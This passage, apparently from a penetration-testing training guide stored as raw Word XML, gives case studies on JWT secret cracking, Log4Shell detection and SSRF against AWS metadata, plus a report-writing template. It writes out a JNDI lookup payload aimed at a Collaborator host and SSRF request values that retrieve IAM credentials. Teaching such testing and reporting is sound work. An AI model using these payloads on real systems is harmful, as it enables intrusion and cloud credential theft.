      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoded JWT (Decoder tab) — changed role from 'user' to 'admin' — signature invalid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used JWT Editor — discovered HS256 with weak secret, brute-forced with hashcat in 4 minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-signed JWT with admin role — accessed /api/v1/admin → full admin panel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="59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CVSS Rating &amp; CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Finding 1: IDOR on Order API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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CRITICAL — CVSS 9.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) — CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Finding 2: Weak JWT Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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CRITICAL — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) — CWE-326</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Finding 3: Vertical Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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CRITICAL — CVSS 10.0 — CWE-269 (Improper Privilege Management)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Finding 4: PII Exposure at Scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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HIGH — CVSS 8.1 — Maps to GDPR Article 32 compliance failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5.2  Case Study — Log4Shell Detection (CVE-2021-44228)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal pentest of a Java-based enterprise application. Apache Log4j 2.0-2.14.1 was suspected based on technology stack identified during recon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Detection with Burp Collaborator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Opened Burp Collaborator Client — copied payload subdomain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Intruder: targeted all headers in the login request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: ${jndi:ldap://[COLLAB].burpcollaborator.net/a}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ran Sniper attack across User-Agent, X-Forwarded-For, Accept-Language, Referer headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Within 30 seconds: Collaborator showed DNS + LDAP interaction from the server's IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed: X-Forwarded-For header was being logged by Log4j — triggering JNDI lookup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS Base Score: 10.0 CRITICAL — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-917: Improper Neutralisation of Special Elements in Expression Language Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any unauthenticated user could achieve RCE by controlling a logged HTTP header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: Upgrade to Log4j 2.15.0+, or set log4j2.formatMsgNoLookups=true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5.3  Case Study — SSRF to AWS Metadata → Cloud Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug bounty program. E-commerce site with 'Import product image from URL' feature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tested url= parameter with Collaborator — received HTTP interaction (basic SSRF confirmed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempted AWS IMDSv1 endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  url=http://169.254.169.254/latest/meta-data/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: list of metadata keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  url=http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: role name 's3-access-role'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  url=http://169.254.169.254/latest/meta-data/iam/security-credentials/s3-access-role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: AccessKeyId, SecretAccessKey, Token — live AWS IAM credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used credentials to list S3 buckets — found PII of 2.1 million customers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS: 9.8 CRITICAL — CWE-918 — CVE-2019-8451 (similar pattern)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: Full cloud environment compromise, massive data breach potential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: Implement IMDSv2 (token-required), block internal IP ranges at application layer, WAF rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 6: PROFESSIONAL PENTEST REPORT WRITING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="3" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C42"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  6.1  Report Structure — Industry Standard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A professional penetration test report must be useful to two audiences: executive stakeholders (who need business impact without technical depth) and technical teams (who need exact reproduction steps to fix findings). A well-structured report addresses both.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Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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1. Cover Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Client name, engagement type, date, tester name, classification (CONFIDENTIAL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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2. Document Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Version history, author, reviewer, distribution list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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3. Executive Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Non-technical overview: scope, methodology, critical findings count, overall risk rating, key recommendations. 1–2 pages max</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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4. Engagement Scope &amp; Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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In-scope hosts/URLs, out-of-scope, testing dates, testing type (black/grey/white box), credentials provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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5. Methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Testing standards followed: OWASP Testing Guide, PTES, OWASP Top 10, tools used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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6. Attack Narrative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Chronological story of the pentest — how findings were discovered and chained. Tells the attack path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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7. Findings (Detailed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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One entry per finding — full technical detail (see below)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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8. Risk Rating Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Summary table of all findings with CVSS scores, severity, affected components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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9. Remediation Roadmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Prioritised fix plan: Critical/High to be fixed within 30 days, Medium 90 days, Low next release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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10. Appendices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Raw tool output, full request/response proof of concepts, methodology details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6.2  Individual Finding Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every finding must contain all of the following elements. This is the industry standard format.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Finding Title</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a clear, descriptive name. Include the vulnerability type and where it was found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: 'SQL Injection in /api/v1/search — Parameter: q'</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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D1E35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
